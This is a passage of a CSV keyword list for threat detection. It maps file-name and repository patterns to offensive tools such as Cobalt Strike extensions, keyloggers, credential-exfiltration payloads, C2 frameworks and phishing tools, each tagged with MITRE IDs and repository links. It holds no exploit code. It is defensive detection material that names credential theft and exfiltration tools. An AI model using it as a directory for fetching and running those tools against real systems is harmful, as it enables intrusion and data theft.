","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*obfuscator*antidisassembly.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*obfuscator.cpp*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*objects.githubusercontent.com/github-production-release-asset-*","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*objects_constrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objects_rbcd_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objects_unconstrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objexec *.o*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*obscuritylabs*","offensive_tool_keyword","Github Username","resources for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/obscuritylabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*obscuritylabs/ase:latest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*obscuritylabs/RAI/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*OCSAF/freevulnsearch*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*octetsplicer/LAZYPARIAH*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*Octoberfest7/KDStab*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*octopus.py *","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*OEP_Hiijack_Inject_Load*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*offensive_notion.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_darwin_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_linux_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_win_*.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","624","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" +"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*offsecginger/koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*OG-Sadpanda/SharpCat*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" +"*OG-Sadpanda/SharpSword*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*OG-Sadpanda/SharpSword*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*OG-Sadpanda/SharpZippo*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" +"*Oh365UserFinder.git*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*oh365userfinder.py*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*Oh365UserFinder-main*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*oifjbnnafapeiknapihcmpeodaeblbkn*","greyware_tool_keyword","rderzh VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*OLDNamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*OleViewDotNet.psd1*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*OlivierLaflamme/PyExec*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*omdakjcmkglenbhjadbccaookpfjihpa*","greyware_tool_keyword","TunnelBear VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omghfjlpggmjjaagoclmmobgdodcjboh*","greyware_tool_keyword","Browsec VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OmriBaso/BesoToken*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*On_Demand_C2.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*On-Demand_C2_BOF.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*OnDemandC2Class.cs*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn 